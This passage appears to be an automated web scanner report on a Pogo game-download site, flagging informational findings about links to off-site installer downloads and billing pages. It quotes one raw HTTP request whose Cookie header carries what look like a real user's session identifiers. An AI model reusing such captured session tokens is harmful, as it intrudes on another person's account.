http://gamecenter.cdn3.oberon-media.com/pogo/exe/avenue_flo_special_dlivery_61548110-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Top&ln=en&ext=avenue_flo_special_dlivery_61548110-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/chuzzle-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Puzzle&ln=en&ext=chuzzle-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/cradle_of_rome_2_56440445-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Puzzle&ln=en&ext=cradle_of_rome_2_56440445-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/cradle_of_rome_2_56440445-setup.exe?RefId=Hot_Sellers&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=cradle_of_rome_2_56440445-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_2-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Hidden Object&ln=en&ext=jewel_quest_mysteries_2-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_2-setup.exe?RefId=Hot_Sellers&origin=pindex_mp_name&genre=Hidden Object&ln=en&ext=jewel_quest_mysteries_2-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_pi_san_francisco_29328371-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Hidden Object&ln=en&ext=mystery_pi_san_francisco_29328371-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/plants_vs_zombies_GOTY-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Strategy&ln=en&ext=plants_vs_zombies_GOTY-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/roads_of_rome_2_01545341-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=New&ln=en&ext=roads_of_rome_2_01545341-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/slingo_mystery_2_68454245-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=New&ln=en&ext=slingo_mystery_2_68454245-setup.exe
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110119950&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110412127&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118017277&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118444187&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119223107&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119354920&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119688580&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119700817&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119714967&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119735947&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=

Request

GET /Category.aspx?code=1000&refId=Hot_Sellers HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 58225
Cache-Control: private, max-age=7010
Date: Sun, 09 Jan 2011 02:09:21 GMT
Connection: close

<html>
<head>
<meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" />


   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">


...[SNIP]...
<td style="padding-left: 5px;">

                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cradle_of_rome_2_56440445-setup.exe?RefId=Hot_Sellers&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=cradle_of_rome_2_56440445-setup.exe" onclick="omnitureLogDownload('119714967','oberonpogostd','Cradle Of Rome 2 Premium','puzzle','1/8/2011 7:06:20 PM')" target="_top"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle"></a>
                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cradle_of_rome_2_56440445-setup.exe?RefId=Hot_Sellers&origin=pindex_mp_name&genre=Puzzle&ln=en&ext=cradle_of_rome_2_56440445-setup.exe" onclick="omnitureLogDownload('119714967','oberonpogostd','Cradle Of Rome 2 Premium','puzzle','1/8/2011 7:06:20 PM')" target="_top" class="txt11b">Try Free</a>
...[SNIP]...
<td style="padding-left: 5px;">

                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_2-setup.exe?RefId=Hot_Sellers&origin=pindex_mp_name&genre=Hidden Object&ln=en&ext=jewel_quest_mysteries_2-setup.exe" onclick="omnitureLogDownload('118017277','oberonpogostd','Jewel Quest Mysteries 2','Hidden Object','1/8/2011 7:06:20 PM')" target="_top"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle"></a>
                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_2-setup.exe?RefId=Hot_Sellers&origin=pindex_mp_name&genre=Hidden Object&ln=en&ext=jewel_quest_mysteries_2-setup.exe" onclick="omnitureLogDownload('118017277','oberonpogostd','Jewel Quest Mysteries 2','Hidden Object','1/8/2011 7:06:20 PM')" target="_top" class="txt11b">Try Free</a>
...[SNIP]...
<td style="padding-left: 5px;">

                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Book_Worm-Setup.exe?RefId=Hot_Sellers&origin=pindex_mp_name&genre=Strategy&ln=en&ext=Book_Worm-Setup.exe" onclick="omnitureLogDownload('110119950','oberonpogostd','bookworm','Strategy','1/8/2011 7:06:20 PM')" target="_top"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle"></a>
                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Book_Worm-Setup.exe?RefId=Hot_Sellers&origin=pindex_mp_name&genre=Strategy&ln=en&ext=Book_Worm-Setup.exe" onclick="omnitureLogDownload('110119950','oberonpogostd','bookworm','Strategy','1/8/2011 7:06:20 PM')" target="_top" class="txt11b">Try Free</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cradle_of_rome_2_56440445-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Puzzle&ln=en&ext=cradle_of_rome_2_56440445-setup.exe" onclick="omnitureLogDownload('119714967','oberonpogostd','Cradle Of Rome 2 Premium','puzzle','1/8/2011 7:06:20 PM')"><img src="/images/games/CradleOfRome2Premium/CradleOfRome2Premium81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cradle_of_rome_2_56440445-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Puzzle&ln=en&ext=cradle_of_rome_2_56440445-setup.exe" onclick="omnitureLogDownload('119714967','oberonpogostd','Cradle Of Rome 2 Premium','puzzle','1/8/2011 7:06:20 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cradle_of_rome_2_56440445-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Puzzle&ln=en&ext=cradle_of_rome_2_56440445-setup.exe" onclick="omnitureLogDownload('119714967','oberonpogostd','Cradle Of Rome 2 Premium','puzzle','1/8/2011 7:06:20 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119714967&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119714967&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_2-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Hidden Object&ln=en&ext=jewel_quest_mysteries_2-setup.exe" onclick="omnitureLogDownload('118017277','oberonpogostd','Jewel Quest Mysteries 2','Hidden Object','1/8/2011 7:06:20 PM')"><img src="/images/games/jewel_quest_mysteries2/jewel_quest_mysteries281x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_2-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Hidden Object&ln=en&ext=jewel_quest_mysteries_2-setup.exe" onclick="omnitureLogDownload('118017277','oberonpogostd','Jewel Quest Mysteries 2','Hidden Object','1/8/2011 7:06:20 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_2-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Hidden Object&ln=en&ext=jewel_quest_mysteries_2-setup.exe" onclick="omnitureLogDownload('118017277','oberonpogostd','Jewel Quest Mysteries 2','Hidden Object','1/8/2011 7:06:20 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118017277&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118017277&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Book_Worm-Setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Strategy&ln=en&ext=Book_Worm-Setup.exe" onclick="omnitureLogDownload('110119950','oberonpogostd','bookworm','Strategy','1/8/2011 7:06:20 PM')"><img src="/images/games/bookworm/bookworm81x46.jpg" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Book_Worm-Setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Strategy&ln=en&ext=Book_Worm-Setup.exe" onclick="omnitureLogDownload('110119950','oberonpogostd','bookworm','Strategy','1/8/2011 7:06:20 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Book_Worm-Setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Strategy&ln=en&ext=Book_Worm-Setup.exe" onclick="omnitureLogDownload('110119950','oberonpogostd','bookworm','Strategy','1/8/2011 7:06:20 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110119950&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110119950&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/plants_vs_zombies_GOTY-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Strategy&ln=en&ext=plants_vs_zombies_GOTY-setup.exe" onclick="omnitureLogDownload('119223107','oberonpogostd','Plants vs Zombies GOTY','Strategy','1/8/2011 7:06:20 PM')"><img src="/images/games/PlantsVsZombies/PlantsVsZombies81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/plants_vs_zombies_GOTY-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Strategy&ln=en&ext=plants_vs_zombies_GOTY-setup.exe" onclick="omnitureLogDownload('119223107','oberonpogostd','Plants vs Zombies GOTY','Strategy','1/8/2011 7:06:20 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/plants_vs_zombies_GOTY-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Strategy&ln=en&ext=plants_vs_zombies_GOTY-setup.exe" onclick="omnitureLogDownload('119223107','oberonpogostd','Plants vs Zombies GOTY','Strategy','1/8/2011 7:06:20 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119223107&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119223107&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_pi_san_francisco_29328371-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Hidden Object&ln=en&ext=mystery_pi_san_francisco_29328371-setup.exe" onclick="omnitureLogDownload('119354920','oberonpogostd','Mystery PI San Francisco','Hidden Object','1/8/2011 7:06:20 PM')"><img src="/images/games/MysteryPIStolenInSanFracisco/MysteryPIStolenInSanFracisco81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_pi_san_francisco_29328371-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Hidden Object&ln=en&ext=mystery_pi_san_francisco_29328371-setup.exe" onclick="omnitureLogDownload('119354920','oberonpogostd','Mystery PI San Francisco','Hidden Object','1/8/2011 7:06:20 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_pi_san_francisco_29328371-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Hidden Object&ln=en&ext=mystery_pi_san_francisco_29328371-setup.exe" onclick="omnitureLogDownload('119354920','oberonpogostd','Mystery PI San Francisco','Hidden Object','1/8/2011 7:06:20 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119354920&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119354920&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/avenue_flo_special_dlivery_61548110-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Top&ln=en&ext=avenue_flo_special_dlivery_61548110-setup.exe" onclick="omnitureLogDownload('119688580','oberonpogostd','Avenue Flo Special Delivery','top_games','1/8/2011 7:06:20 PM')"><img src="/images/games/AvenueFloSpecialDelivery/AvenueFloSpecialDelivery81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/avenue_flo_special_dlivery_61548110-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Top&ln=en&ext=avenue_flo_special_dlivery_61548110-setup.exe" onclick="omnitureLogDownload('119688580','oberonpogostd','Avenue Flo Special Delivery','top_games','1/8/2011 7:06:20 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/avenue_flo_special_dlivery_61548110-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Top&ln=en&ext=avenue_flo_special_dlivery_61548110-setup.exe" onclick="omnitureLogDownload('119688580','oberonpogostd','Avenue Flo Special Delivery','top_games','1/8/2011 7:06:20 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119688580&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119688580&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/roads_of_rome_2_01545341-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=New&ln=en&ext=roads_of_rome_2_01545341-setup.exe" onclick="omnitureLogDownload('119735947','oberonpogostd','Roads of Rome 2','newGames','1/8/2011 7:06:20 PM')"><img src="/images/games/RoadsofRome2/RoadsofRome281x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/roads_of_rome_2_01545341-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=New&ln=en&ext=roads_of_rome_2_01545341-setup.exe" onclick="omnitureLogDownload('119735947','oberonpogostd','Roads of Rome 2','newGames','1/8/2011 7:06:20 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/roads_of_rome_2_01545341-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=New&ln=en&ext=roads_of_rome_2_01545341-setup.exe" onclick="omnitureLogDownload('119735947','oberonpogostd','Roads of Rome 2','newGames','1/8/2011 7:06:20 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119735947&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119735947&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/chuzzle-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Puzzle&ln=en&ext=chuzzle-setup.exe" onclick="omnitureLogDownload('110412127','oberonpogostd','Chuzzle','puzzle','1/8/2011 7:06:20 PM')"><img src="/images/games/Chuzzle/Chuzzle81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/chuzzle-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Puzzle&ln=en&ext=chuzzle-setup.exe" onclick="omnitureLogDownload('110412127','oberonpogostd','Chuzzle','puzzle','1/8/2011 7:06:20 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/chuzzle-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Puzzle&ln=en&ext=chuzzle-setup.exe" onclick="omnitureLogDownload('110412127','oberonpogostd','Chuzzle','puzzle','1/8/2011 7:06:20 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110412127&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110412127&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/slingo_mystery_2_68454245-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=New&ln=en&ext=slingo_mystery_2_68454245-setup.exe" onclick="omnitureLogDownload('119700817','oberonpogostd','Slingo Mystery 2','newGames','1/8/2011 7:06:20 PM')"><img src="/images/games/SlingoMystery2/SlingoMystery281x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/slingo_mystery_2_68454245-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=New&ln=en&ext=slingo_mystery_2_68454245-setup.exe" onclick="omnitureLogDownload('119700817','oberonpogostd','Slingo Mystery 2','newGames','1/8/2011 7:06:20 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/slingo_mystery_2_68454245-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=New&ln=en&ext=slingo_mystery_2_68454245-setup.exe" onclick="omnitureLogDownload('119700817','oberonpogostd','Slingo Mystery 2','newGames','1/8/2011 7:06:20 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119700817&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119700817&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Mahjongg_dimensions_51548812-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Puzzle&ln=en&ext=Mahjongg_dimensions_51548812-setup.exe" onclick="omnitureLogDownload('118444187','oberonpogostd','Mahjongg Dimensions','puzzle','1/8/2011 7:06:20 PM')"><img src="/images/games/MahjonggDimensionsDeluxe/MahjonggDimensionsDeluxe81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Mahjongg_dimensions_51548812-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Puzzle&ln=en&ext=Mahjongg_dimensions_51548812-setup.exe" onclick="omnitureLogDownload('118444187','oberonpogostd','Mahjongg Dimensions','puzzle','1/8/2011 7:06:20 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/Mahjongg_dimensions_51548812-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Puzzle&ln=en&ext=Mahjongg_dimensions_51548812-setup.exe" onclick="omnitureLogDownload('118444187','oberonpogostd','Mahjongg Dimensions','puzzle','1/8/2011 7:06:20 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118444187&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=118444187&channel=110184400&RefID=Hot_Sellers&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...

16.21. http://download-games.pogo.com/deluxe.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/deluxe.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://download-games.pogo.com/deluxe.aspx?code=11964850&refid=14ma_bj3&pageSection=free_home_marketing_alley

The response contains the following links to other domains:

http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled-setup.exe?RefId=14ma_bj3&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled-setup.exe
